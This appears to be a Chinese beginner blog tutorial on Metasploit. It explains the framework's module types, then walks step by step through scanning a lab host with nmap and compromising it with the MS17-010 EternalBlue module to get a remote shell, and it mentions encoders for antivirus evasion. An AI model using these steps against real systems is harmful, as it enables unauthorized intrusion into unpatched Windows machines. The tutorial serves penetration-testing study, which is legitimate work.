文章目录

• 一、Metasploit是什么？
• • 1、Auxiliaries(辅助模块)
  • 2、Exploit(渗透攻击模块)
  • 3、payload(攻击载荷模块)
  • 4、Post(后期渗透模块)
  • 5、Encoder(编码工具模块)
• 二、Metasploit入侵步骤
• • 1.准备
  • 2.扫描端口
  • • 1、直接在metasploit框架里使用nmap扫描端口
  • 3、查看版本
  • 4、查找对应利用漏洞模块
  • 5、shell

一、Metasploit是什么？

这里我简单介绍一下，方便你们小白了解(大佬直接跳过就行)
Metasploit框架是一个开源工具，旨在方便渗透测试，他是有ruby程序语言编写的模板化框架，具有很好的扩展性，便于渗透测试人员开发，使用定制的工具模板。Metasploit可向后端模块提供多种用来控制测试的接口。Metasploit还有第三方接口，如nmap、SQLMap,可以直接在控制台使用。

1、Auxiliaries(辅助模块)

该模块主要作用是扫描、嗅探、指纹识别辅佐渗透。

2、Exploit(渗透攻击模块)

该模块里面包含许多类型模块,渗透测试者利用这些模块多漏洞进行利用

3、payload(攻击载荷模块)

该模块用于渗透攻击成功之后，在目标系统执行任意命令或者执行特点代码，总结来说就是建立目标机与攻击机稳定连接，可返回shell或进行注入

4、Post(后期渗透模块)

该模块主要用于在获取目标系统远程控制权后，进行一系列的后渗透攻击动作，如获取敏感信息、实施跳板攻击。

5、Encoder(编码工具模块)

该工具在渗透测试中负责免杀，以防止被杀毒软件、防火墙、IDS及类似的安全软件检测出来
。

二、Metasploit入侵步骤

1.准备

1、首先你要确定两台主机在同一网段，并且能够ping通，这些我就不做演示了
2、更新软件
apt-get update
apt-get upgrade

3、msfconsole:打开metasploit

2.扫描端口

1、直接在metasploit框架里使用nmap扫描端口

你们也可以使用模块进行扫描

nmap -p 1-65535 -Pn 192.168.0.1

3、查看版本

1、search scanner/smb/smb_
2、use 7 -->show options -->set rhosts 192.168.0.1 -->run

4、查找对应利用漏洞模块

1、search exploit/windows/smb/

2、use exploit/windows/smb/ms17_010_eternalblue-->set rhost靶机ip-->set lhost 攻击机ip
我不知道你们这里的payload是不是主动配置的或者加上去的，我这由于以前玩过，不太清楚，如果不是或有问题请告知。

3、这里我们就成功了

5、shell

到了这一步就随便你们怎么玩了！
shell --> chcp 65001

注：如果我这里讲的有哪里不太详细、遗漏或错误，请及时告知。Thanks♪(･ω･)ﾉ！

标签：Metasploit,渗透,扫描,win7,--,模块,入侵,smb
来源： https://blog.csdn.net/qq_53030229/article/details/121188795